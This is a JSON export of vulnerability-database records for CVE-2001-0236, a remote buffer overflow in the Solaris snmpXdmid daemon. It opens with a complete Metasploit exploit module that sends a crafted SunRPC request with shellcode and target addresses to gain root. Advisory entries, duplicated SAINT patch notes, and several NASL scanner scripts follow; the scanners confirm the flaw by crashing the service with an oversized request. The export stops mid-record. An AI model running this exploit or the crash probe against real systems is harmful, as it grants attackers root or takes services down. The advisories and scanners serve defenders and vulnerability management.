{"hash": "3069af7bfea2dc27dc42e25e683bb5c4c69031880de7498b9ee70f4c22ffa8da", "id": "EDB-ID:20649", "lastseen": "2016-02-02T14:43:24", "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "vulnersScore": 7.2}, "bulletinFamily": "exploit", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/20649/", "description": "Solaris 2.6/7.0/8 snmpXdmid Buffer Overflow Vulnerability (msf). CVE-2001-0236. Remote exploit for solaris platform", "title": "Solaris 2.6/7.0/8 snmpXdmid Buffer Overflow Vulnerability msf", "sourceData": "source: http://www.securityfocus.com/bid/2417/info\r\n \r\nVersions 2.6, 7, and 8 of Sun Microsystem's Solaris operating environment ship with service called 'snmpXdmid'. This daemon is used to map SNMP management requests to DMI requests and vice versa.\r\n \r\nSnmpXdmid contains a remotely exploitable buffer overflow vulnerability. The overflow occurs when snmpXdmid attempts to translate a 'malicious' DMI request into an SNMP trap.\r\n \r\nSnmpXdmid runs with root privileges and any attacker to successfully exploit this vulnerability will gain superuser access immediately.\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be redistributed\r\n# according to the licenses defined in the Authors field below. In the\r\n# case of an unknown or missing license, this file defaults to the same\r\n# license as the core Framework (dual GPLv2 and Artistic). The latest\r\n# version of the Framework can always be obtained from metasploit.com.\r\n##\r\n\r\npackage Msf::Exploit::solaris_snmpxdmid;\r\nuse base \"Msf::Exploit\";\r\nuse strict;\r\nuse Pex::Text;\r\nuse Pex::SunRPC;\r\nuse Pex::XDR;\r\n\r\nmy $advanced = { };\r\nmy $info =\r\n{\r\n\t'Name' => 'Solaris snmpXdmid AddComponent Overflow',\r\n\t'Version' => '$Revision: 1.6 $',\r\n\t'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ],\r\n\t'Arch' => [ 'sparc' ],\r\n\t'OS' => [ 'solaris' ],\r\n\t'Priv' => 1,\r\n\t'UserOpts' => {\r\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\r\n\t\t'RPORT' => [1, 'PORT', 'The target RPC port', 111],\r\n\t},\r\n\t'Payload' => {\r\n\t\t'Space' => 64000,\r\n\t\t'MinNops' => 63000,\r\n\t},\r\n\t'Description' => Pex::Text::Freeform(qq{\r\n\tExploit based on LSD's solsparc_snmpxdmid.c. Exploit a simple overflow and\r\n\treturn to the heap avoiding NX stacks.\r\n\t}),\r\n\t'Refs' => [\r\n\t\t['BID', 2417],\r\n\t\t['URL', 'http://lsd-pl.net/code/SOLARIS/solsparc_snmpxdmid.c'],\r\n\t],\r\n\t'Targets' => [\r\n\t\t[ 'Solaris 7 / SPARC', 0xb1868 + 96000, 0xb1868 + 32000 ],\r\n\t\t[ 'Solaris 8 / SPARC', 0xcf2c0 + 96000, 0xcf2c0 + 32000 ],\r\n\t],\r\n\t'Keys' => ['snmpxdmid'],\r\n};\r\n\r\nsub new {\r\n\tmy $class = shift;\r\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\r\n\treturn($self);\r\n}\r\n\r\nsub Exploit {\r\n\tmy $self = shift;\r\n\r\n\tmy $target_idx = $self->GetVar('TARGET');\r\n\tmy $shellcode = $self->GetVar('EncodedPayload')->Payload;\r\n\r\n\tmy $target = $self->Targets->[$target_idx];\r\n\r\n\tmy %data;\r\n\r\n\tmy $host = $self->GetVar('RHOST');\r\n\tmy $port = $self->GetVar('RPORT');\r\n\r\n\tif(Pex::SunRPC::Clnt_create(\\%data, $host, $port, 100249, 1, \"tcp\", \"tcp\") == -1)\r\n\t{\r\n\t\t$self->PrintLine(\"[*] RPC request failed (snmpXdmid).\");\r\n\t\treturn;\r\n\t}\r\n\r\n\t$self->PrintLine(\"[*] Using port $data{'rport'}\");\r\n\tPex::SunRPC::Authunix_create(\\%data, \"localhost\", 0, 0, []);\r\n\t$self->PrintLine(\"[*] Generating buffer...\");\r\n\r\n\tmy $array1 =\r\n\t\t(pack(\"N\", ($target->[2])) x (1248/4)).\r\n\t\t(pack(\"N\", ($target->[1])) x (352/4)).\r\n\t\t(pack(\"N\", 0));\r\n\r\n\tmy $array2 =\r\n\t\t(pack(\"N\", 0) x (64000/4)).\r\n\t\t($shellcode).\r\n\t\t(pack(\"N\", 0));\r\n\r\n\tmy @array1_tbl = map { unpack(\"C\", $_) } split(//, $array1);\r\n\tmy @array2_tbl = map { unpack(\"C\", $_) } split(//, $array2);\r\n\r\n\tmy $buf =\r\n\t\tPex::XDR::Encode_int(0).\r\n\t\tPex::XDR::Encode_int(0).\r\n\t\tPex::XDR::Encode_bool(1).\r\n\t\tPex::XDR::Encode_int(0).\r\n\t\tPex::XDR::Encode_bool(1).\r\n\t\tPex::XDR::Encode_varray([@array1_tbl], \\&Pex::XDR::Encode_lchar).\r\n\t\tPex::XDR::Encode_bool(1).\r\n\t\tPex::XDR::Encode_varray([@array2_tbl], \\&Pex::XDR::Encode_lchar).\r\n\t\tPex::XDR::Encode_int(0).\r\n\t\tPex::XDR::Encode_int(0);\r\n\r\n\t$self->PrintLine(\"[*] Sending payload...\");\r\n\r\n\tif(Pex::SunRPC::Clnt_call(\\%data, 0x101, $buf) == -1)\r\n\t{\r\n\t\t$self->PrintLine(\"[*] snmpXdmid addcomponent request failed.\");\r\n\t\treturn;\r\n\t}\r\n\r\n\t$self->PrintLine(\"[*] Sent!\");\r\n\r\n\treturn;\r\n}\r\n\r\n", "objectVersion": "1.0", "cvelist": ["CVE-2001-0236"], "published": "2001-03-15T00:00:00", "osvdbidlist": ["546"], "references": [], "reporter": "vlad902", "modified": "2001-03-15T00:00:00", "href": "https://www.exploit-db.com/exploits/20649/"}

{"cve": [{"lastseen": "2017-10-10T10:34:42", "references": ["http://marc.info/?l=bugtraq&m=98462536724454&w=2", "http://www.securityfocus.com/bid/2417", "http://www.cert.org/advisories/CA-2001-05.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/6245", "http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/207", "http://www.ciac.org/ciac/bulletins/l-065.shtml"], "description": "Buffer overflow in Solaris snmpXdmid SNMP to DMI mapper daemon allows remote attackers to execute arbitrary commands via a long \"indication\" event.", "edition": 3, "reporter": "NVD", "published": "2001-05-03T00:00:00", "title": "CVE-2001-0236", "type": "cve", "enchantments": {"score": {"modified": "2017-10-10T10:34:42", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2001-0236"], "scanner": [], "modified": "2017-10-09T21:29:39", "cpe": ["cpe:/o:sun:solaris:8.0", "cpe:/o:sun:solaris:7.0::x86", "cpe:/o:sun:solaris:8.0::x86", "cpe:/o:sun:solaris:2.6", "cpe:/o:sun:solaris:7.0", "cpe:/o:sun:solaris:2.6::x86"], "id": "CVE-2001-0236", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0236", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2016-09-25T14:13:33", "references": [], "edition": 1, "description": "**Name**| snmpXdmid \n---|--- \n**CVE**| CVE-2001-0236 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| snmpXdmid Buffer Overflow \n**Notes**| References: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F26981&amp;zone_32=category%3Asecurity%20snmpXdmid \nCVE Name: CVE-2001-0236 \nVENDOR: Sun \nDevelopment Notes: This is a one shot exploit. If the first try fails the process will die and \nneeds to be restarted. \nPatch Info: Solstice Enterprise Agent for Solaris 2.6 with 106787-15 or later \nSolaris 7 with patch 107709-15 or later \nSolaris 8 with patch 108869-07 or later \nWARNING: This exploits computes a rather large payload which makes it CPU intensive and slow. \nDate public: Mar 15, 2001 \nCERT Advisory: http://www.kb.cert.org/vuls/id/648304 \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0236 \nCVSS: 10.0 \n\n", "reporter": "Immunity Canvas", "published": "2001-05-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "canvas", "title": "Immunity Canvas: SNMPXDMID", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0236"], "modified": "2001-05-03T00:00:00", "id": "SNMPXDMID", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/snmpXdmid", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2018-08-31T00:08:14", "references": [], "description": "Added: 03/12/2007 \nCVE: [CVE-2001-0236](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0236>) \nBID: [2417](<http://www.securityfocus.com/bid/2417>) \nOSVDB: [546](<http://www.osvdb.org/546>) \n\n\n### Background\n\nThe SNMP to DMI mapper daemon (snmpXdmid) translates Simple Network Management Protocol (SNMP) events to Desktop Management Interface (DMI) indications and vice-versa. \n\n### Problem\n\nsnmpXdmid is affected by a buffer overflow vulnerability when a specially crafted indication event is translated into an SNMP trap. This could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply one of the patches referenced in [Sun Bulletin 00207](<http://sunsolve.sun.com/search/document.do?assetkey=1-22-00207-1>) or disable snmpXdmid as shown in [CERT Advisory 2001-05](<http://www.cert.org/advisories/CA-2001-05.html#solution>). \n\n### References\n\n<http://www.cert.org/advisories/CA-2001-05.html> \n\n\n### Limitations\n\nThere may be a delay before this exploit succeeds. \n\n### Platforms\n\nSunOS 5.7 / Solaris 7 \nSunOS 5.8 / Solaris 8 \n \n\n", "edition": 3, "reporter": "SAINT Corporation", "published": "2007-03-12T00:00:00", "title": "snmpXdmid buffer overflow", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0236"], "modified": "2007-03-12T00:00:00", "id": "SAINT:97F5A4949BB6A49C4E9A0D66D4EC671F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/solaris_snmpxdmid", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:03", "references": [], "edition": 1, "description": "Added: 03/12/2007 \nCVE: [CVE-2001-0236](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0236>) \nBID: [2417](<http://www.securityfocus.com/bid/2417>) \nOSVDB: [546](<http://www.osvdb.org/546>) \n\n\n### Background\n\nThe SNMP to DMI mapper daemon (snmpXdmid) translates Simple Network Management Protocol (SNMP) events to Desktop Management Interface (DMI) indications and vice-versa. \n\n### Problem\n\nsnmpXdmid is affected by a buffer overflow vulnerability when a specially crafted indication event is translated into an SNMP trap. This could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply one of the patches referenced in [Sun Bulletin 00207](<http://sunsolve.sun.com/search/document.do?assetkey=1-22-00207-1>) or disable snmpXdmid as shown in [CERT Advisory 2001-05](<http://www.cert.org/advisories/CA-2001-05.html#solution>). \n\n### References\n\n<http://www.cert.org/advisories/CA-2001-05.html> \n\n\n### Limitations\n\nThere may be a delay before this exploit succeeds. \n\n### Platforms\n\nSunOS 5.7 / Solaris 7 \nSunOS 5.8 / Solaris 8 \n \n\n", "reporter": "SAINT Corporation", "published": "2007-03-12T00:00:00", "title": "snmpXdmid buffer overflow", "type": "saint", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0236"], "modified": "2007-03-12T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/solaris_snmpxdmid", "id": "SAINT:26D816A89B62DD28722782ED35A7D3BD", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:02:01", "references": [], "description": "Added: 03/12/2007 \nCVE: [CVE-2001-0236](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0236>) \nBID: [2417](<http://www.securityfocus.com/bid/2417>) \nOSVDB: [546](<http://www.osvdb.org/546>) \n\n\n### Background\n\nThe SNMP to DMI mapper daemon (snmpXdmid) translates Simple Network Management Protocol (SNMP) events to Desktop Management Interface (DMI) indications and vice-versa. \n\n### Problem\n\nsnmpXdmid is affected by a buffer overflow vulnerability when a specially crafted indication event is translated into an SNMP trap. This could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply one of the patches referenced in [Sun Bulletin 00207](<http://sunsolve.sun.com/search/document.do?assetkey=1-22-00207-1>) or disable snmpXdmid as shown in [CERT Advisory 2001-05](<http://www.cert.org/advisories/CA-2001-05.html#solution>). \n\n### References\n\n<http://www.cert.org/advisories/CA-2001-05.html> \n\n\n### Limitations\n\nThere may be a delay before this exploit succeeds. \n\n### Platforms\n\nSunOS 5.7 / Solaris 7 \nSunOS 5.8 / Solaris 8 \n \n\n", "edition": 1, "reporter": "SAINT Corporation", "published": "2007-03-12T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "saint", "title": "snmpXdmid buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0236"], "modified": "2007-03-12T00:00:00", "id": "SAINT:FC9A42BB12ADCF7F88B13E88699A4CEB", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/solaris_snmpxdmid", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-12-08T11:44:12", "references": ["2001-a-0003"], "pluginID": "10659", "description": "The remote RPC service 100249 (snmpXdmid) is vulnerable\nto a heap overflow which allows any user to obtain a root\nshell on this host.", "edition": 2, "reporter": "This script is Copyright (C) 2001 Intranode", "published": "2005-11-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "snmpXdmid overflow", "type": "openvas", "naslFamily": "Gain a shell remotely", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0236"], "modified": "2017-12-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=10659", "id": "OPENVAS:10659", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: snmpXdmid.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: snmpXdmid overflow\n#\n# Authors:\n# Intranode\n#\n# Copyright:\n# Copyright (C) 2001 Intranode\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote RPC service 100249 (snmpXdmid) is vulnerable\nto a heap overflow which allows any user to obtain a root\nshell on this host.\";\n\ntag_solution = \"disable this service (/etc/init.d/init.dmi stop) if you don't use\nit, or contact Sun for a patch\";\n\nif(description)\n{\n script_id(10659);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"IAVA\", value:\"2001-a-0003\");\n script_bugtraq_id(2417);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_cve_id(\"CVE-2001-0236\");\n \n name = \"snmpXdmid overflow\";\n \n script_name(name);\n \n \n script_category(ACT_MIXED_ATTACK); # mixed\n \n script_copyright(\"This script is Copyright (C) 2001 Intranode\");\n family = \"Gain a shell remotely\";\n script_family(family);\n script_dependencies(\"secpod_rpc_portmap.nasl\");\n script_require_keys(\"rpc/portmap\");\n \n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\n\n\nport = get_rpc_port(program:100249, protocol:IPPROTO_TCP);\nif(port)\n{\n if(safe_checks())\n {\n data = \" \nThe remote RPC service 100249 (snmpXdmid) may be vulnerable\nto a heap overflow which allows any user to obtain a root\nshell on this host.\n\n*** OpenVAS reports this vulnerability using only\n*** information that was gathered. Use caution\n*** when testing without safe checks enabled.\n\nSolution: disable this service (/etc/init.d/init.dmi stop) if you don't use\nit, or contact Sun for a patch\";\n security_message(port:port, data:data);\n exit(0);\n }\n \n \n if(get_port_state(port))\n {\n soc = open_sock_tcp(port);\n if(soc)\n {\n #\n # We forge a bogus RPC request, with a way too long\n # argument. The remote process will die immediately,\n # and hopefully painlessly.\n #\n req = raw_string(0x00, 0x00, 0x0F, 0x9C, 0x22, 0x7D,\n\t \t 0x93, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x02, 0x00, 0x01, 0x87, 0x99, 0x00, 0x00,\n\t\t 0x00, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00,\n\t\t 0x00, 0x01, 0x00, 0x00, 0x00, 0x20, 0x3A, 0xF1, \n\t\t 0x28, 0x90, 0x00, 0x00, 0x00, 0x09, 0x6C, 0x6F,\n\t\t 0x63, 0x61, 0x6C, 0x68, 0x6F, 0x73, 0x74, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x01, 0x00, 0x00, 0x06, 0x44, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00) +\n\t\t crap(length:28000, data:raw_string(0x00));\n\n\n send(socket:soc, data:req);\n r = recv(socket:soc, length:4096);\n close(soc);\n sleep(1);\n soc2 = open_sock_tcp(port);\n if(!soc2)security_message(port);\n else close(soc2);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:35:49", "references": ["2001-a-0003"], "pluginID": "136141256231010659", "description": "The remote RPC service 100249 (snmpXdmid) is vulnerable\nto a heap overflow which allows any user to obtain a root\nshell on this host.", "edition": 3, "reporter": "This script is Copyright (C) 2001 Intranode", "published": "2005-11-03T00:00:00", "title": "snmpXdmid overflow", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Gain a shell remotely", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0236"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231010659", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010659", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: snmpXdmid.nasl 9348 2018-04-06 07:01:19Z cfischer $\n# Description: snmpXdmid overflow\n#\n# Authors:\n# Intranode\n#\n# Copyright:\n# Copyright (C) 2001 Intranode\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote RPC service 100249 (snmpXdmid) is vulnerable\nto a heap overflow which allows any user to obtain a root\nshell on this host.\";\n\ntag_solution = \"disable this service (/etc/init.d/init.dmi stop) if you don't use\nit, or contact Sun for a patch\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10659\");\n script_version(\"$Revision: 9348 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:01:19 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"IAVA\", value:\"2001-a-0003\");\n script_bugtraq_id(2417);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_cve_id(\"CVE-2001-0236\");\n \n name = \"snmpXdmid overflow\";\n \n script_name(name);\n \n \n script_category(ACT_MIXED_ATTACK); # mixed\n \n script_copyright(\"This script is Copyright (C) 2001 Intranode\");\n family = \"Gain a shell remotely\";\n script_family(family);\n script_dependencies(\"secpod_rpc_portmap.nasl\");\n script_require_keys(\"rpc/portmap\");\n \n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\n\n\nport = get_rpc_port(program:100249, protocol:IPPROTO_TCP);\nif(port)\n{\n if(safe_checks())\n {\n data = \" \nThe remote RPC service 100249 (snmpXdmid) may be vulnerable\nto a heap overflow which allows any user to obtain a root\nshell on this host.\n\n*** OpenVAS reports this vulnerability using only\n*** information that was gathered. Use caution\n*** when testing without safe checks enabled.\n\nSolution: disable this service (/etc/init.d/init.dmi stop) if you don't use\nit, or contact Sun for a patch\";\n security_message(port:port, data:data);\n exit(0);\n }\n \n \n if(get_port_state(port))\n {\n soc = open_sock_tcp(port);\n if(soc)\n {\n #\n # We forge a bogus RPC request, with a way too long\n # argument. The remote process will die immediately,\n # and hopefully painlessly.\n #\n req = raw_string(0x00, 0x00, 0x0F, 0x9C, 0x22, 0x7D,\n\t \t 0x93, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x02, 0x00, 0x01, 0x87, 0x99, 0x00, 0x00,\n\t\t 0x00, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00,\n\t\t 0x00, 0x01, 0x00, 0x00, 0x00, 0x20, 0x3A, 0xF1, \n\t\t 0x28, 0x90, 0x00, 0x00, 0x00, 0x09, 0x6C, 0x6F,\n\t\t 0x63, 0x61, 0x6C, 0x68, 0x6F, 0x73, 0x74, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x01, 0x00, 0x00, 0x06, 0x44, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00) +\n\t\t crap(length:28000, data:raw_string(0x00));\n\n\n send(socket:soc, data:req);\n r = recv(socket:soc, length:4096);\n close(soc);\n sleep(1);\n soc2 = open_sock_tcp(port);\n if(!soc2)security_message(port);\n else close(soc2);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:58:19", "references": [], "pluginID": "10659", "description": "The remote RPC service 100249 (snmpXdmid) is vulnerable to a heap overflow which allows any user to obtain a root shell on this host.\n\nELVISCICADA is one of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/08 by a group known as the Shadow Brokers.", "edition": 7, "reporter": "Tenable", "published": "2001-05-03T00:00:00", "title": "Solaris snmpXdmid Long Indication Event Overflow (ELVISCICADA)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gain a shell remotely", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0236"], "modified": "2018-07-30T00:00:00", "cpe": [], "id": "SNMPXDMID.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=10659", "sourceData": "#\n# This script is released under the GPL\n#\n\n# Changes by Tenable:\n# - Revised plugin title, changed family, output formatting touch-ups (8/20/09)\n# - Updated to use compat.inc, added CVSS score used extra instead of data arg in security_hole (11/20/2009)\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10659);\n script_version(\"1.34\");\n script_cvs_date(\"Date: 2018/07/30 15:31:32\");\n\n script_cve_id(\"CVE-2001-0236\");\n script_bugtraq_id(2417);\n script_xref(name:\"CERT\", value:\"648304\");\n script_xref(name:\"EDB-ID\", value:\"20648\");\n script_xref(name:\"EDB-ID\", value:\"20649\");\n\n script_name(english:\"Solaris snmpXdmid Long Indication Event Overflow (ELVISCICADA)\");\n script_summary(english:\"heap overflow through snmpXdmid\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an application that is affected by a heap overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote RPC service 100249 (snmpXdmid) is vulnerable to a heap\noverflow which allows any user to obtain a root shell on this host.\n\nELVISCICADA is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/08 by a group known as the Shadow\nBrokers.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Disable this service (/etc/init.d/init.dmi stop) if you don't use it,\nor contact Sun for a patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2001/05/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK); # mixed\n script_copyright(english:\"This script is Copyright (C) 2001-2018 Intranode\");\n script_family(english:\"Gain a shell remotely\");\n\n script_dependencies(\"rpc_portmap.nasl\");\n script_require_keys(\"rpc/portmap\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"sunrpc_func.inc\");\n\n\nport = get_rpc_port2(program:100249, protocol:IPPROTO_TCP);\nif (port)\n{\n if(safe_checks())\n {\n if (report_paranoia < 2) audit(AUDIT_PARANOID);\n report = \"\nThe remote RPC service 100249 (snmpXdmid) may be vulnerable\nto a heap overflow which allows any user to obtain a root\nshell on this host.\";\n\n security_hole(port:port, extra:report);\n exit(0);\n }\n\n\n if(get_port_state(port))\n {\n soc = open_sock_tcp(port);\n if(soc)\n {\n #\n # We forge a bogus RPC request, with a way too long\n # argument. The remote process will die immediately,\n # and hopefully painlessly.\n #\n req = raw_string(0x00, 0x00, 0x0F, 0x9C, 0x22, 0x7D,\n\t \t 0x93, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x02, 0x00, 0x01, 0x87, 0x99, 0x00, 0x00,\n\t\t 0x00, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00,\n\t\t 0x00, 0x01, 0x00, 0x00, 0x00, 0x20, 0x3A, 0xF1,\n\t\t 0x28, 0x90, 0x00, 0x00, 0x00, 0x09, 0x6C, 0x6F,\n\t\t 0x63, 0x61, 0x6C, 0x68, 0x6F, 0x73, 0x74, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t 0x00, 0x01, 0x00, 0x00, 0x06, 0x44, 0x00, 0x00,\n\t\t 0x00, 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00) +\n\t\t crap(length:28000, data:raw_string(0x00));\n\n\n send(socket:soc, data:req);\n r = recv(socket:soc, length:4096);\n close(soc);\n sleep(1);\n soc2 = open_sock_tcp(port);\n if(!soc2)security_hole(port);\n else close(soc2);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": 